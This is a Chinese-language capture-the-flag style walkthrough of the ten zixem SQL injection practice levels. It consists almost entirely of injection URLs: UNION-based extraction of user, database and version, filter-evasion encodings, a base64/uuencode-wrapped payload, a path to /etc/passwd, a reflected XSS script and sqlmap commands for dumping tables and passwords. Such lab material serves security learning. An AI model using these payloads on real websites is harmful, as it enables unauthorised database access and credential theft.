SQL Challenges靶机
http://www.zixem.altervista.org/SQLi/
![](https://upload-images.jianshu.io/upload_images/4664072-f7cd648c44209108.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第一关
http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-9ce3848404c489dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-b8ee7806182170cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+
![](https://upload-images.jianshu.io/upload_images/4664072-8fec1913711543b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+
![](https://upload-images.jianshu.io/upload_images/4664072-7977a0c0083d2f93.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+
![](https://upload-images.jianshu.io/upload_images/4664072-8e7a0b2f6fbd789c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sqlmap -u "注入点" --dbs
sqlmap -u "注入点" -D xx --tables
sqlmap -u "注入点" -D XX -T XX --columns
sqlmap -u "注入点" -D XX -T XX -C XX --dump
sqlmap -u "注入点" --users
sqlmap -u "注入点" --passwords
![](https://upload-images.jianshu.io/upload_images/4664072-93c4556e08c88297.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
xss
http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E
第二关
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-695f2670873ff83b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-33e2c53b52a40a22.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-6092ac0e5445af51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+
![](https://upload-images.jianshu.io/upload_images/4664072-adcf1d12e4980533.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-6f292d75c71f6452.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-63c43fd72d4794a1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-c1903f3a72e98784.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第三关
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-a7982eda68e167f1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-9050a859130deb68.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-5fc80a7a97e99bb4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+
![](https://upload-images.jianshu.io/upload_images/4664072-94bd1e53f949356d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-f000d1d4190e82ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-b00d8a6219ee9aed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+
![](https://upload-images.jianshu.io/upload_images/4664072-4e1400683df03086.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第四关
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-357e609408a840ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-67e2152c4cc930e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-7e86099e1c6d3559.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+
![](https://upload-images.jianshu.io/upload_images/4664072-d8cfb7df0bc9723f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+
![](https://upload-images.jianshu.io/upload_images/4664072-bb1795c1406ba583.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+
![](https://upload-images.jianshu.io/upload_images/4664072-ebe7e9280e2aa5e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第五关
http://www.zixem.altervista.org/SQLi/login_lvl5.php
![](https://upload-images.jianshu.io/upload_images/4664072-a935671a33abdd78.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c
![](https://upload-images.jianshu.io/upload_images/4664072-7f696a9018c235ba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a738cea7f5b18a38.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第六关
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-b817fa99e278f24b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-f1a84e373d6be250.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+
![](https://upload-images.jianshu.io/upload_images/4664072-b4f2d18c6a50bed3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+
![](https://upload-images.jianshu.io/upload_images/4664072-d5251ef5706d37be.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sqlmap 跑盲注
第七关
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-287bb2a0c3dd6dd8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-95675b5c678807e3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+
![](https://upload-images.jianshu.io/upload_images/4664072-e106de5ef0b1251b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+
![](https://upload-images.jianshu.io/upload_images/4664072-6a0e5adb81d8f6ed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+
![](https://upload-images.jianshu.io/upload_images/4664072-74c0dbb3653f5bc8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a8e8085a7721b8e3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+
![](https://upload-images.jianshu.io/upload_images/4664072-7dc8dfd677487206.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6e52d48be72f03e2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第八关
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\
![](https://upload-images.jianshu.io/upload_images/4664072-0dec185804185cbe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27
![](https://upload-images.jianshu.io/upload_images/4664072-253f965d41c8932d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-c64a3f42b1c7a8d6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-4ba8f23178d95e07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1
![](https://upload-images.jianshu.io/upload_images/4664072-5446705883e288f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+
![](https://upload-images.jianshu.io/upload_images/4664072-f3bcc94c671d5203.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-12d01e2b7b094e3c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
特殊字符绕过
A plus sign (+)
A simple URL encoded space (%20)
A null byte (%00)
A newline (%0a)
A tab (%09)
A carriage return (%0d)
构造poc
空格%20
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1
![](https://upload-images.jianshu.io/upload_images/4664072-df9966c421551cb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
空字节%00
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-f518058cd08fce9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
换行\n %0a
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-271e6900e460a9e4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
回车%0d
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-277f9136dfb1baa9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+
![](https://upload-images.jianshu.io/upload_images/4664072-928981113782b882.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-6fb474fcb0d293e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ed1578a02ad771f8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--
![](https://upload-images.jianshu.io/upload_images/4664072-c24bb77c48a7f2de.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-11c252d6b4a7ea25.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
大小写
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-48361609f020be7f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
url加密
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20
![](https://upload-images.jianshu.io/upload_images/4664072-50b40fb4b3f83440.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用特殊字符 *
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-00361208681e1097.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-08c0b88ac60f167f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
关键词替换
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--
![](https://upload-images.jianshu.io/upload_images/4664072-5b1bca75120acd99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--
![](https://upload-images.jianshu.io/upload_images/4664072-cf8f2f3e3231aceb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第九关
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--
![](https://upload-images.jianshu.io/upload_images/4664072-ac31212a1a2bd844.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+
![](https://upload-images.jianshu.io/upload_images/4664072-2171a8df4579e26d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+
![](https://upload-images.jianshu.io/upload_images/4664072-0a008807a229f09e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+
![](https://upload-images.jianshu.io/upload_images/4664072-53dc071e31c0f4e7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+
![](https://upload-images.jianshu.io/upload_images/4664072-6561943fd071e8cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+
![](https://upload-images.jianshu.io/upload_images/4664072-3cc0a6ef6625128f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第十关
http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=
![](https://upload-images.jianshu.io/upload_images/4664072-35f23e2bdfc105c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
构造编码
1 AND 1=2 UNION SELECT 1,2--
使用Uuencode decoder 进行解码
<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```
![](https://upload-images.jianshu.io/upload_images/4664072-5207499f54d2bf14.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
base64加密
PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=
![](https://upload-images.jianshu.io/upload_images/4664072-b0a74b2812d4a6ed.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=
![](https://upload-images.jianshu.io/upload_images/4664072-95440bf2d52091f9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
构造注入语句
1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--
结果
M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```
![](https://upload-images.jianshu.io/upload_images/4664072-c0c652c6537dca73.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
64编码
TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
![](https://upload-images.jianshu.io/upload_images/4664072-c3f9c7bca083260b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
![](https://upload-images.jianshu.io/upload_images/4664072-9cdbd29bd0ba1ca0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
参考文档 https://www.cnblogs.com/hack404/p/10387894.html